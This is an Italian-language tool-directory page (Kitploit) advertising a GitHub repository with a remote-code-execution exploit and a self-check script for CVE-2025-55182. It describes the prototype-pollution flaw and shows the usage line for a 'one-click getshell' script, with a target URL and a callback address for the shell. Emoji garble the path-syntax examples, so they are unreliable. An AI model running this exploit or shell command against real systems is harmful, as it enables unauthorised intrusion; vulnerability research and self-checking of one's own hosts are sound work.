Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — CVE-2025-55182 Metodo di rilevamento e sfruttamento degli attacchi | Kitploit
Strumenti/GitHubGitHub/sun977/cve-2025-55182
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubsun977/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 Metodo di rilevamento e sfruttamento degli attacchi

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 RCE

Strumento di verifica personale per controllare la vulnerabilità CVE-2025-55182

Principio della vulnerabilità

Durante la decodifica del payload inviato agli endpoint delle funzioni server, esiste un difetto nel parsing dei percorsi. Utilizza i due punti per separare le proprietà degli oggetti e ottenere valori annidati (ad esempio $1🅰️b corrisponde a {"a":{"b":"foo"}}.a.b), ma non verifica l'esistenza delle proprietà. Quando si passa $1🅰️a, viene attivato un accesso non valido a {}.a.a, causando un errore 500 lato server; mentre un attaccante può costruire un payload speciale sfruttando la contaminazione della catena dei prototipi (prototype pollution) e l'iniezione di codice per ottenere RCE.

Descrizione della directory

  • exp.py: codice di exploit (getshell con un clic)
  • cve-2025-55182-check.sh: strumento di autoverifica per la vulnerabilità host

Metodo di sfruttamento

root@kitploit:~
python3 exp.py -t http://127.0.0.1:8080/ -a 127.0.0.1:4444

Metodo di autoverifica

root@kitploit:~
CVE-2025-55182-Check.sh [-h] [-f <path>] [-a]

Dichiarazione di esclusione di responsabilità

Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza. Non utilizzarlo per scopi illegali.

Scarica lo strumento